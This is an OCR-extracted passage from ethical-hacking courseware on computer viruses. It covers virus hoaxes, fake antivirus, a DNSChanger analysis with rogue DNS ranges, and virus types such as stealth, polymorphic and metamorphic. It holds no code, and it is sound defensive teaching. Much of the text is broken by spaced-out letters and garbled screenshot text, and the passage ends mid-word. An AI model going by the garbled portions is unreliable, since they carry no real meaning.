S o u rc e : S e c u r ity T h r e a t R e p o r t 2 0 1 2 ( h t t p : / / w w w . s o p h o s . c o m ) B l a c k h a t S e a rc h E n g in e O p t i m i z a t i o n (SEO): U sin g t h is t e c h n i q u e t h e a t t a c k e r r a n k s m a l w a r e p a g e s h ig h in se arch re s u lts S o cial E n g in e e r e d C lic k - ja c k in g : T h e a t t a c k e r s t r i c k t h e users i n t o c lic k in g o n i n n o c e n t - l o o k i n g w e b p ages t h a t c o n t a i n m a l w a r e S p e a r p h is h i n g S ite s: T his t e c h n i q u e is used f o r m im i c k i n g l e g i t i m a t e in s t it u t i o n s , such as ban ks, in an a t t e m p t t o ste al a c c o u n t lo g in c r e d e n t i a l s M a l v e r t i s i n g : E m b e d s m a l w a r e in ad n e t w o r k s t h a t d is p la y acro ss h u n d r e d s o f l e g i t i m a t e , h ig h t r a f f i c sites C o m p r o m i s e d L e g i t i m a t e W e b s it e s : H o s t e m b e d d e d m a l w a r e t h a t s p re a d s t o u n s u s p e c t i n g v is ito rs D r i v e - b y D o w n l o a d s : T h e a t t a c k e r e x p l o i t s f l a w s in b r o w s e r s o f t w a r e t o in s ta ll m a l w a r e j u s t by v is itin g a w e b p age
M o d u le 0 7 P ag e 1026
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
V i r u s
H o a x e s
a n d
F a k e
A n t i v i r u s e s
H o ax es a r e f a l s e a l a r m s c la im in g r e p o r t s a b o u t a n o n - e x i s t in g v ir u s w h ic h m a y c o n ta in v iru s a t t a c h m e n t s
tifai*ft-F0R W A I1r)T14l'W A N IN flA M 0N n'R lFN 0V tA M IIV A N nrO N TA rn ntAsc rm v/Aflo mu warningamong rnitN D S.rA M iivandcontactsHo* houMt* w * t d*'* tk*mat rwJw vvC oikxcptn y w ith4 1 1*tM chm vHvntltfv O> O S T C A R O'R O MU ir.O R tS IO N A T IO NO fB A R A C K O B A M A. ifgjrdlM iO fW hOS n t It to you Itft J V lfU S tfU t0p1A humiahi, imaoi, m n tornsthew hole run)c dsc you com puter. rih b 1 1 W W IN M M l4 1 > IU U IIL v OU y C M N U lU I1 IKHid) U 1llO tlTMjfMlllWA I' H U M
***
1 1
0 1
dtstr jctivtvirM^ver Theviiw ... .discovered bv McAfee vtdiv. nd thpp 1 4nor tear jc for :h i
1 >
t S e Z e t o S e t t o f a l U i e l l o d D i M . ,m I i v i c t l . rv i u l x i f o i m a t b o n k v L
w -
j y
| r J
! ! L
i f s r s r *
==
V ir u s
H o a x e s
a n d
F a k e
A n tiv ir u s e s
V iru s H o a x e s A v ir u s h o a x is s i m p l y a b lu ff. V iru s e s , by t h e i r n a t u r e , h a v e a lw a y s c r e a te d a h o r r i f y i n g i m p r e s s io n . H oa x es a re t y p i c a l l y u n t r u e sca re a le r t s t h a t u n s c r u p u l o u s in d iv id u a ls s e n d t o c r e a te h a v o c . It is f a i r l y c o m m o n f o r i n n o c e n t users t o pass th e s e p h o n y m essa ge s a lo n g t h i n k i n g t h e y a re h e lp in g o t h e r s a v o id t h e " v i r u s . " 0 0 H oa xes a re fa lse a la r m s c la im in g r e p o r t s a b o u t n o n - e x i s t i n g v iru s e s T he se w a r n i n g m essages, w h i c h can b e p r o p a g a t e d r a p id ly , s t a t in g t h a t ac e r ta in m e s s a g e s h o u ld n o t be o p e n e d , a n d t h a t d o i n g so w o u l d d a m a g e o n e 's s y s te m 0 0 In s o m e cases, th e s e w a r n i n g m essa ge s t h e m s e l v e s c o n t a i n v iru s a t t a c h m e n t s T he se possess t h e c a p a b i l it y o f v a s t d e s t r u c t i o n o n t a r g e t s y s te m s e m a il
M a n y h o a x e s t r y t o " s e l l" t h in g s t h a t a re t e c h n i c a l l y n o n s e n s e . N e v e rth e le s s , t h e h o a x e r has t o be s o m e w h a t o f an e x p e r t t o s p re a d h o a x e s in o r d e r t o a v o id b e in g i d e n t if ie d a n d c a u g h t. T h e r e f o r e , it is a g o o d p r a c tic e t o lo o k f o r t e c h n i c a l d e t a i ls a b o u t h o w t o b e c o m e i n f e c t e d . A lso se arch f o r i n f o r m a t i o n in t h e w i ld t o le a rn m o r e a b o u t t h e h o a x , e s p e c ia lly by s c a n n in g b u l l e t i n b o a r d s w h e r e p e o p le a c tiv e ly discuss c u r r e n t h a p p e n in g s in t h e c o m m u n i t y .
M o d u le 0 7 P ag e 1027
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
T ry t o c ro s s c h e c k t h e i d e n t i t y o f t h e p e r s o n w h o has p o s te d t h e w a r n i n g . A lso l o o k f o r m o r e i n f o r m a t i o n a b o u t t h e h o a x / w a r n i n g f r o m s e c o n d a r y s o u rc e s . B e fo re j u m p i n g t o c o n c lu s io n s by r e a d in g c e r t a i n d o c u m e n t s o n t h e I n t e r n e t , c h e c k t h e f o l l o w i n g : Q If it is p o s te d a n o th e r source If t h e p e r s o n w h o has p o s te d t h e n e w s is n o t a k n o w n p e r s o n in t h e c o m m u n i t y o r an e x p e r t , c ro s s c h e c k t h e i n f o r m a t i o n w i t h a n o t h e r s o u r c e 0 If a g o v e r n m e n t b o d y has p o s te d t h e n e w s , t h e p o s tin g s h o u ld also h a v e a r e f e r e n c e t o th e c o rre s p o n d in g fe d e ra l r e g u la tio n Q O n e o f t h e m o s t e f f e c t i v e c h e c k s is t o lo o k u p t h e s u s p e c te d h o a x v i r u s b y n a m e o n a n t i v i r u s s o f t w a r e v e n d o r sites Q If t h e p o s tin g is te c h n ic a l, h u n t f o r sites t h a t w o u l d c a t e r t o t h e t e c h n i c a l i t i e s , a n d t r y t o a u th e n tic a te th e in fo rm a tio n
S u b je c t: FO R W AR D THIS W A R N IN G A M O N G FRIENDS, FA M ILY AN D CONTACTS PLEASE FORW ARD THIS W A R N IN G A M O N G FRIENDS, FAM ILY A N D CONTACTSI You s h o u ld be a le rt d u rin g th e n e xt fe w days. D o n o t o p e n a n y m essage w ith a n a tta c h m e n t e n title d 'POSTCARD FR O M BEJING o r 'R ESIG N ATIO N OF 8A R A C K O B A M A , regardless o f w h o se n t it t o y o u . It is a v iru s th a t o p e n s A POSTCARD IM AG E, th e n 'b u rn s ' th e w h o le h a rd C disc o f y o u r c o m p u te r. This is th e w o r s t v ir u s a n n o u n c e d by CN N last e ve n in g . It has been classified by M ic r o s o ft as th e m o s t d e s tr u c tiv e v ir u s ev e r. The v iru s w a 5 d is c o v e re d b y M c A fe e y e s te rd a y , a n d th e re is n o re p a ir y e t fo r th is k in d o f v iru s. This v iru s s im p ly d e s tro y s th e Z e ro S ector o f th e H ard Disc, w h e re th e v ita l in fo rm a tio n is ke p t. COPY THIS E M A IL, AN D SEND IT TO YOUR FRIENDS.REMEMBER: IF YOU SEND IT TO THEM , YOU W ILL BENEFIT ALL OF US. E n d -o f-m a il Thanks.
by n e w s g r o u p s t h a t a re s u s p ic io u s , c r o s s c h e c k t h e i n f o r m a t i o n w i t h
F a k e A n tiv iru s e s Fake a n tiv ir u s e s is a m e t h o d o f a f f e c t i n g a s y s te m b y h a c k e rs a n d it can p o is o n y o u r s y s te m a n d o u t b r e a k t h e r e g is t r y a n d s y s te m file s t o a l l o w t h e a t t a c k e r t o t a k e f u ll c o n t r o l a n d access t o y o u r c o m p u t e r . It a p p e a rs a n d p e r f o r m s s i m i l a r l y t o a real a n t i v i r u s p r o g r a m . Fake a n t i v i r u s p r o g r a m s f i r s t a p p e a r o n d i f f e r e n t b r o w s e r s a n d w a r n users t h a t t h e y h ave d i f f e r e n t s e c u r i t y t h r e a t s o n t h e i r s y s te m , a n d t h is m e s s a g e is b a c k e d u p b y r e a l s u s p ic io u s v iru s e s . W h e n t h e u s e r tr ie s t o r e m o v e t h e v ir u s e s , t h e n t h e y a re n a v ig a te d t o a n o t h e r p age w h e r e t h e y n e e d t o b u y o r s u b s c r ib e t o t h a t a n t i v i r u s a n d p r o c e e d t o p a y m e n t d e ta ils . T he se f a k e a n t i v i r u s p r o g r a m s a re b e e n f a b r i c a t e d in s u ch a w a y t h a t t h e y d r a w t h e a t t e n t i o n o f t h e u n s u s p e c t i n g u s e r i n t o in s t a llin g t h e s o f t w a r e . S o m e o f t h e m e t h o d s used t o e x t e n d t h e usage a n d in s t a l l a t i o n o f fa k e a n t i v i r u s p r o g r a m s in c lu d e : E m a il a n d m e s s a g in g : A t t a c k e r s use s p a m e m a il a n d social n e t w o r k i n g m e ss a g e s t o s p re a d t h is t y p e o f i n f e c t e d e m a il t o users a n d p r o b e t h e u s e r t o o p e n t h e a t t a c h m e n t s f o r s o f t w a r e i n s t a lla t io n .
M o d u le 0 7 P ag e 1028
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
S e a rch e n g in e o p t i m i z a t i o n : A t t a c k e r s g e n e r a t e p ages r e la t e d t o
p u b lic o r c u r r e n t
s e a rch t e r m s a n d p la n t t h e m t o a p p e a r as e x t r a o r d i n a r y a n d t h e la t e s t in s e a rch e n g in e r e s u lts . T h e w e b p ages s h o w a le rts a b o u t i n f e c t i o n t h a t e n c o u r a g e t h e u s e r t o b u y t h e fa k e a n tiv ir u s . Q C o m p r o m i s e d w e b s i t e s : A t t a c k e r s s e c r e t l y b r e a k i n t o p o p u l a r sites t o in s ta ll t h e fa k e a n tiv ir u s e s , w h i c h can be used t o e n tic e users t o d o w n l o a d t h e f a k e a n t i v i r u s b y r e ly in g o n t h e s ite 's p o p u l a r i t y .
J
a
Protection
-wacy
I
P a th I n lr c t io m C \w C C ^ S \J N t5 ^ c ^ e e U J r^ 4 ifV * g 0 a 5 7 2 35
SMtacat
M o d u le 0 7 P ag e 1029
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
i r u s
n a l y s i s :
h a n g e r
CEH
It a c ts a s a b o t a n d c a n b e o r g a n iz e d in to a B o tN e t a n d c o n tr o lle d f r o m a r e m o te lo c a tio n
<W >
It s p r e a d s t h r o u g h e m a il s , s o c ia l e n g i n e e r i n g tr i c k s , a n d u n tr u s te d d o w n lo a d s f r o m t h e I n t e r n e t
$
<K>
D N S C h a n g e r
UHU
h t t p : / /w w w . to ta ld e fe n s e . c o m
C o p y rig h t b y E & C a u a c tl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
V ir u s
A n a ly s is :
S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m D N S C h a n g e r ( A l u r e o n ) is m a l w a r e t h a t s p re a d s t h r o u g h e m a ils , s o c ia l e n g i n e e r i n g tr i c k s , a nd u n t r u s t e d d o w n l o a d s f r o m t h e I n t e r n e t . It a cts as a b o t a n d can be o rg a n iz e d i n t o a b o t n e t a nd c o n t r o l l e d f r o m a r e m o t e l o c a tio n . T his m a l w a r e a c h ie v e s DNS r e d i r e c t i o n b y m o d i f y i n g t h e s y s te m r e g is t r y k e y s e ttin g s a g a in s t an i n t e r f a c e d e v ic e such as n e t w o r k c a rd . D N S C h a n g e r has r e c e iv e d s i g n ific a n t a t t e n t i o n d u e t o t h e large n u m b e r o f a f f e c t e d s y s te m s w o r l d w i d e a n d t h e f a c t t h a t as p a r t o f t h e b o t n e t t a k e d o w n , t h e FBI t o o k o w n e r s h i p o f r o g u e DNS s e r v e r s t o e n s u r e t h o s e a f f e c t e d d id n o t i m m e d i a t e l y lose t h e a b i l it y t o re s o lv e DNS n a m e s . T his can e v e n m o d i f y t h e DNS s e ttin g s o n t h e v i c t i m ' s PC t o d i v e r t I n t e r n e t t r a f f i c t o m a lic io u s w e b s i t e s in o r d e r t o g e n e r a t e f r a u d u l e n t a d r e v e n u e , sell f a k e s e rv ic e s , o r ste al p e r s o n a l f in a n c ia l i n f o r m a t i o n .
M o d u le 0 7 P ag e 1030
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
i r u s
n a l y s i s :
h a n g e r
(C o n td)
The ro g u e DNS servers can e xist in an y o f th e fo llo w in g ranges:
D N S C h an g er
64.28.176.0 - 64.28.191.255, 6 7 .210.0.0 - 67.210.15.255 7 7 .6 7 .8 3 .0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255 85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255
DNSChanger sniffs the credential and redirects the request to real website Real Website
ww.xrecyritY-tP1
IP: 200.0.0.45
DNSChanger infects victim's computer by change her DNS IP address to: 64.28.176.2
to u t
V ir u s
A n a ly s is :
D N S C h a n g e r ( C o n td )
S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m
M o d u le 0 7 P ag e 1031
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
>
F a k e W e b s it e
D N S C h a n g e r s n if f s t h e c r e d e n t ia l a n d r e d ir e c t s t h e r e q u e s t t o r e a l w e b s it e
Real Website
w v A v . x s e c u r it v . c o m IP : 2 0 0 . 0 . 0 . 4 5
IP: 65.0.0.2
DNS R equest d o
to 64.28.176.2
>
D N S C h a n g e r i n f e c t s v ic t im 's c o m p u t e r b y c h a n g e h e r D N S IP a d d re s s to : 6 4 .2 8 .1 7 6 .2
A t t a c k e r r u n s D N S S e r v e r in
T o in f e c t t h e s y s te m a nd s te a l c r e d e n tia ls , t h e a t t a c k e r has t o f i r s t ru n DNS s e rv e r. H e re t h e a t t a c k e r r u n s his o r h e r D N S s e r v e r in Russia w i t h an IP o f, say, 6 4 .2 8 . 1 7 6 . 2 . N e x t, t h e a t t a c k e r i n f e c ts t h e v i c t i m ' s c o m p u t e r by c h a n g in g his o r h e r DNS IP a d d re s s t o : 6 4 .2 8 .1 7 6 .2 . W h e n th is m a l w a r e has i n f e c t e d t h e s y s te m , it e n t i r e l y c h a n g e s t h e DNS s e ttin g s o f t h e i n f e c t e d m a c h in e a n d fo r c e s all t h e DNS r e q u e s t t o g o t o t h e D N S s e rv e r ru n b y t h e a tta c k e r . A f t e r a lt e r in g th e s e t t i n g o f t h e DNS, a n y r e q u e s t t h a t is m a d e b y t h e s y s te m is s e n t t o t h e m a l i c io u s DNS s e r v e r . H e re , t h e v ic tim sent DNS Request w h a t is t h e IP a d d re s s o f w w w .x s e c u rity .c o m " to
M o d u le 0 7 P ag e 1032
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0l1nCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
M o d u le Flo w
CEH
V iru s
a n d
W o rm s C o n c e p ts
C o m p u te r W o rm s
C o u n te r m e a s u re s
M a lw a re A n a ly s is
|| M o d u le
F lo w
V iru s a n d W o r m s C o n c e p t
M a l w a r e A n a ly s is
T y p e s o f V ir u s e s
C o u n te rm e a su re s
y v
C o m p u te r W o rm s
P e n e t r a t i o n T e s t in g
M o d u le 0 7 P ag e 1033
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
S y ste m o r B o o t S e c to r V ir u s e s
M e ta m o r p h ic
C lu s te r V iru s e s
S p arse In fe c to r V iru s
M u ltip a rtite
D ir e c t A c tio n o r T ra n sie n t
T y p e s
o f V ir u s e s c o n c e p ts . N o w w e w ill discuss
So fa r, w e h a v e d iscu ss e d v a r io u s v ir u s a n d w o r m v a r io u s t y p e s o f viru s e s .
T his s e c tio n h ig h lig h ts v a r io u s ty p e s o f v iru s e s a n d w o r m s such as file a n d m u l t i p a r t i t e v ir u s e s , m a c r o v iru s e s , c lu s t e r viru s e s , s t e a l t h / t u n n e l i n g v iru s e s , e n c r y p t i o n v iru s e s , m e t a m o r p h i c v iru s e s , shell viru s e s , a n d so o n . C o m p u t e r v iru s e s a re t h e m a l i c io u s s o f t w a r e p r o g r a m s w r i t t e n by a t ta c k e r s t o i n t e n t i o n a l l y e n t e r t h e t a r g e t e d s y s te m w i t h o u t t h e u s e r 's p e r m i s s i o n . As a re s u lt, t h e y a f f e c t t h e s e c u r it y s y s te m a n d p e r f o r m a n c e o f t h e m a c h in e . A f e w o f t h e m o s t c o m m o n ty p e s o f c o m p u t e r v iru s e s t h a t a d v e r s e l y a f f e c t s e c u r it y s y s te m s a re d iscu s se d in d e ta il o n t h e f o l l o w i n g slides.
T y p e s
o f V ir u s e s
M o d u le 0 7 P ag e 1034
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
W h a t D o T h e y In fe c t? S y s te m o r B o o t S e c to r V ir u s e s f*. _ T h e m o s t c o m m o n t a r g e t s f o r a v iru s a re t h e s y s te m s e c to rs , w h i c h a re n o t h i n g b u t
t h e M a s t e r B o o t R e c o rd a n d t h e DOS B o o t R e c o rd S y s t e m s e c to r s . T h e s e a re t h e a re a s o n th e d isk t h a t are e x e c u t e d w h e n t h e PC is b o o t e d . E ve ry d isk has a s y s te m s e c to r o f s o m e s o rt. T h e y s p e c ia lly in f e c t t h e f l o p p y b o o t s e c to r s a n d r e c o r d s o f t h e h a rd disk. For e x a m p le : Disk K iller a n d S to n e v iru s . F ile V iru s e s E x e c u ta b le file s a re i n f e c t e d b y file v iru s e s , as t h e y i n s e r t t h e i r c o d e i n t o t h e o r ig in a l file a n d g e t e x e c u te d . File v iru s e s a re la r g e r in n u m b e r , b u t t h e y a re n o t t h e m o s t c o m m o n l y f o u n d . T h e y i n f e c t in a v a r i e t y o f w a y s a n d can be f o u n d in a la rg e n u m b e r o f file ty p e s . M u ltip a r tite V iru s T h e y i n f e c t p r o g r a m file s, a n d t h is f ile in t u r n a ffe c ts t h e b o o t s e c to r s su ch as In v a d e r , Flip, a n d T e q u ila . C lu s te r V iru s e s C lu s te r v iru s e s i n f e c t file s w i t h o u t c h a n g in g t h e f ile o r p la n t in g e x tr a file s ; t h e y c h a n g e t h e DOS d i r e c t o r y i n f o r m a t i o n so t h a t e n t r i e s p o i n t t o t h e v ir u s c o d e in s te a d o f t h e a c tu a l p ro g ra m . M a c r o V iru s M i c r o s o f t W o r d o r a s i m i l a r a p p li c a t i o n can be i n f e c t e d t h r o u g h a c o m p u t e r v iru s c a lle d a m a c r o v iru s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c tio n s w h e n t h e a p p li c a t i o n is t r i g g e r e d o r s o m e t h i n g else. M a c r o v iru s e s a re s o m e w h a t less h a r m f u l t h a n o t h e r ty p e s . T h e y a re u s u a lly s p re a d via an e m a il. H o w D o T h e y In fe c t? S te a lth V ir u s e s T h e se v iru s e s t r y t o h id e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s b y a c t i v e l y a l t e r i n g a n d
c o r r u p t i n g t h e c h o s e n s e rv ic e call i n t e r r u p t s w h e n t h e y a re b e in g ru n . R e q u e s ts t o p e r f o r m o p e r a t i o n s in r e s p e c t t o th e s e se rv ic e call i n t e r r u p t s a re r e p la c e d by v iru s c o d e . T h e se v iru s e s s ta te fa lse i n f o r m a t i o n t o h id e t h e i r p r e s e n c e f r o m a n t i v i r u s p r o g r a m s . For e x a m p le , t h e s te a lth v ir u s h id e s t h e o p e r a t i o n s t h a t it m o d i f i e d a n d g ive s fa ls e r e p r e s e n t a t i o n s . T hus, it ta k e s o v e r p o r t i o n s o f t h e t a r g e t s y s te m a nd h id e s its v i r u s c o d e .
L i f e :
T u n n e lin g V iru s e s T h e s e v ir u s e s t r a c e t h e s te p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s te m
M o d u le
07
P ag e 1035
\ c_
T h e d e c r y p t i n g m o d u l e r e m a in s c o n s t a n t , w h e r e a s t h e d i f f e r e n t keys a re u sed f o r e n c r y p t i o n .
iri) P o l y m o r p h i c V i r u s e s
, T h e s e v iru s e s w e r e d e v e lo p e d t o c o n f u s e a n t i v i r u s p r o g r a m s t h a t scan f o r v iru s e s in t h e s y s te m . It is d i f f i c u l t t o t r a c e t h e m , since t h e y c h a n g e t h e i r c h a r a c te r is t ic s e a ch t i m e t h e y in f e c t, e.g., e v e r y c o p y o f t h is v ir u s d if f e r s f r o m its p r e v io u s o n e . V i r u s d e v e l o p e r s h a v e e v e n c r e a t e d m e t a m o r p h i c e n g in e s a n d v ir u s w r i t i n g t o o l k its t h a t m a k e t h e c o d e o f an e x is t in g v ir u s lo o k d i f f e r e n t f r o m o t h e r s o f its k in d . M e ta m o r p h ic V iru s e s A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d i n t o t h e t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . T his t e c h n i q u e , in w h i c h t h e o rig in a l a l g o r i t h m r e m a in s in t a c t, is u sed t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e . T his is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v iru s c o n s is ts o f c o m p le x e x te n s iv e c o d e . O v e r w r it in g F ile o r C a v ity V iru s e s S o m e p r o g r a m file s h a v e a re as o f e m p t y space. T his e m p t y sp ace is t h e m a in t a r g e t o f th e s e viru s e s . T h e C a v i t y V ir u s , also k n o w n as t h e S pace F ille r V ir u s , s to r e s its c o d e in th is e m p t y space. T h e v ir u s in s ta lls it s e lf in th is u n o c c u p ie d sp ace w i t h o u t a n y d e s t r u c t io n t o t h e o rig in a l c o d e . It in s ta lls it s e lf in t h e file it a t t e m p t s t o in f e c t. S p a rs e In fe c to r V iru s e s
W -------- T h e y d is g u is e t h e m s e l v e s as g e n u in e a p p li c a t i o n s
M o d u le 0 7 P ag e 1036
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
c o m p a r e d t o an " e g g s h e l l / m a k in g i t s e lf t h e o rig in a l p r o g r a m a n d t h e h o s t c o d e its s u b r o u t i n e . H e re , t h e o rig in a l c o d e is m o v e d t o a n e w l o c a t io n by t h e v ir u s c o d e a n d t h e v i r u s a s s u m e s its i d e n t it y . F ile E x te n s io n V ir u s e s F. File e x t e n s i o n v ir u s e s c h a n g e t h e e x te n s io n s o f file s ; .TXT is safe, as it in d ic a te s a p u r e t e x t file . If y o u r c o m p u t e r 's f i l e e x t e n s i o n s v i e w is t u r n e d o f f a n d s o m e o n e s e n d s y o u a file n a m e d BA D .T X T .V B S , y o u w i ll see o n l y B A D .TXT. > ' f | A d d -o n V iru s e s M o s t v iru s e s a re a d d - o n v iru s e s . T his t y p e o f v ir u s a p p e n d s its c o d e t o t h e b e g in n in g o f t h e h o s t c o d e w i t h o u t m a k in g a n y c h a n g e s t o t h e l a t t e r . T hu s , t h e v ir u s c o r r u p t s t h e s t a r t u p i n f o r m a t i o n o f t h e h o s t c o d e , a n d places it s e lf in its p la ce, b u t it d o e s n o t t o u c h t h e h o s t c o d e . H o w e v e r , t h e v iru s c o d e is e x e c u t e d b e f o r e t h e h o s t c o d e . T h e o n l y in d i c a t i o n t h a t t h e file is c o r r u p t e d is t h a t t h e size o f t h e file has in c re a s e d . In tr u s iv e V iru s e s T his f o r m o f v ir u s o v e r w r i t e s its c o d e e i t h e r b y c o m p l e t e l y r e m o v i n g t h e t a r g e t h o s t's
p r o g r a m c o d e , o r s o m e t i m e s it o n l y o v e r w r i t e s p a r t o f it. T h e r e f o r e , t h e o rig in a l c o d e is n o t e x e c u te d p r o p e r ly . D ir e c t A c tio n o r T r a n s ie n t V iru s e s T r a n s fe r s all c o n t r o l s t o t h e h o s t c o d e w h e r e it reside s, se le c ts t h e t a r g e t p r o g r a m t o be m o d if ie d , a nd c o r r u p t s it. = ffr *y ' T e r m in a t e a n d S ta y R e s id e n t V ir u s e s (T S R s) A TSR v i r u s r e m a in s p e r m a n e n t l y in m e m o r y d u r in g t h e e n t i r e w o r k se ssio n, e v e n
a f t e r t h e t a r g e t h o s t p r o g r a m is e x e c u te d a n d t e r m i n a t e d . It can be r e m o v e d o n l y b y r e b o o t i n g t h e s y s te m .
M o d u le 0 7 P ag e 1037
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
S y s t e m
o r
B o o t
S e c t o r V
i r u s e s
C E H
B o o t S e c to r V ir u s
E x e c u tio n
B e fo re In fe c tio n
A fte r In fe c tio n
V iru s C o d e
MBR
Copyright by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
S y s te m
o r B o o t S e c to r V ir u s e s
S y s te m s e c t o r v iru s e s can be d e f i n e d as t h o s e t h a t a f f e c t t h e e x e c u t a b l e c o d e o f t h e
disk, r a t h e r t h a n t h e b o o t s e c t o r v ir u s t h a t a ffe c ts t h e DOS b o o t s e c t o r o f t h e disk. A n y s y s te m is d iv i d e d i n t o a reas, c a lle d s e c to rs , w h e r e t h e p r o g r a m s a re s to r e d . T h e t w o ty p e s o f s y s te m s e c to r s are: 0 M B R ( M a s t e r B o o t R e c o rd ) M BR s a re t h e m o s t v i r u s - p r o n e z o n e s b e c a u s e if t h e M B R is c o r r u p t e d , all d a ta w i ll be lost. 0 DBR (DOS B o o t R e c o rd ) T h e DOS b o o t s e c t o r is e x e c u t e d w h e n e v e r t h e s y s te m is b o o t e d . T his is t h e c r u c ia l p o i n t o f a t t a c k f o r viru s e s . T h e s y s te m s e c t o r co n s is ts o f 5 1 2 b y t e s o f m e m o r y . Because o f th is , s y s te m s e c t o r v iru s e s c o n c e a l t h e i r c o d e in s o m e o t h e r d isk space. T h e m a in c a r r i e r o f s y s te m s e c t o r v iru s e s is t h e f l o p p y disk. T h e se v iru s e s g e n e r a lly re s id e in t h e m e m o r y . T h e y can also be c a u se d b y T ro ja n s . S o m e s e c t o r v iru s e s also s p re a d t h r o u g h i n f e c t e d file s , a n d t h e y a re ca lle d m u l t i p a r t v iru s e s .
M o d u le 0 7 P ag e 1038
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
G
A f t e r I n f e c tio n V
O
V iru s C ode FIGURE 7 .6 : S yste m o r B o o t S e c to r V iru se s
M o d u le 0 7 P ag e 1039
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
i l e
a n d
l t i p
r t i t e
i r u s e s
C E H
F ile
a n d
M u ltip a r tite
V ir u s e s
F ile V ir u s e s File v iru s e s i n f e c t file s t h a t a re e x e c u te d o r i n t e r p r e t e d in t h e s y s te m such as C O M , EXE, SYS, OVL, OBJ, PRG, M N U , a n d BAT file s. File v iru s e s can be e i t h e r d i r e c t - a c t i o n ( n o n - r e s i d e n t ) o r m e m o r y - r e s i d e n t . O v e r w r i t i n g v iru s e s ca use i r r e v e r s i b l e d a m a g e t o t h e files. T h e s e v iru s e s m a i n l y t a r g e t a r a n g e o f o p e r a t i n g s y s te m s t h a t in c lu d e W i n d o w s , UNIX, DOS, a n d M a c i n t o s h . C h a r a c te r iz in g F ile V iru s e s File v iru s e s a re m a i n l y c h a r a c te r iz e d and d e s c r ib e d b ase d on th e ir p h ysica l b e h a v io r o r
c h a r a c te r is t ic s . T o cla ssify a file v ir u s is b y t h e t y p e o f file t a r g e t e d by it, such as EXE o r C O M file s, t h e b o o t s e c to r , e tc. A f ile v ir u s can also be c h a r a c t e r iz e d b ase d o n h o w it i n f e c ts t h e t a r g e t e d file (also k n o w n as t h e h o s t files): Q Q Q P r e p e n d in g : w r i t e s it s e lf i n t o t h e b e g in n in g o f t h e h o s t file 's c o d e A p p e n d i n g : w r i t e s it s e lf t o t h e e n d o f t h e h o s t file O v e r w r i t i n g : o v e r w r i t e s t h e h o s t file 's c o d e w i t h its o w n c o d e I n s e r t i n g : in s e rts it s e lf i n t o gaps in s id e t h e h o s t file 's c o d e
M o d u le
07
P ag e 1 0 4 0
File v iru s e s a re also cla ssifie d b ase d o n w h e t h e r t h e y a re n o n - m e m o r y r e s i d e n t o r m e m o r y r e s id e n t. N o n - m e m o r y r e s i d e n t v iru s e s s e a rch f o r EXE fi l e s o n a h a r d d r iv e a n d t h e n i n f e c t t h e m , w h e r e a s m e m o r y r e s i d e n t v iru s e s sta ys a c tiv e ly in m e m o r y , a n d t r a p o n e o r m o r e s y s te m f u n c t io n s . File v iru s e s a re said t o be p o l y m o r p h i c , e n c r y p t e d , o r n o n - e n c r y p t e d . A p o l y m o r p h i c o r e n c r y p t e d v ir u s c o n t a in s o n e o r m o r e d e c r y p t o r s a n d a m a in co d e . M a i n v ir u s c o d e is d e c r y p t e d b y t h e d e c r y p t o r b e f o r e i t s ta rts . A n e n c r y p t e d v ir u s u s u a lly uses v a r ia b le o r fi x e d k e y d e c r y p t o r s , w h e r e a s p o l y m o r p h i c v iru s e s h a ve d e c r y p t o r s t h a t a re r a n d o m l y g e n e r a t e d f r o m i n s t r u c t i o n s o f p r o c e s s o rs a n d t h a t c o n s is t o f a l o t o f c o m m a n d s t h a t a re n o t used in t h e d e c r y p t i o n p ro c e s s . E x e c u t io n o f P a y lo a d : D ir e c t a c tio n : I m m e d i a t e l y u p o n e x e c u t io n T im e b o m b : A f t e r a s p e c ifie d p e r io d o f t i m e C o n d i t i o n t r ig g e r e d : O n ly u n d e r c e r ta in c o n d it io n s M u ltip a r tite V iru s e s A m u l t i p a r 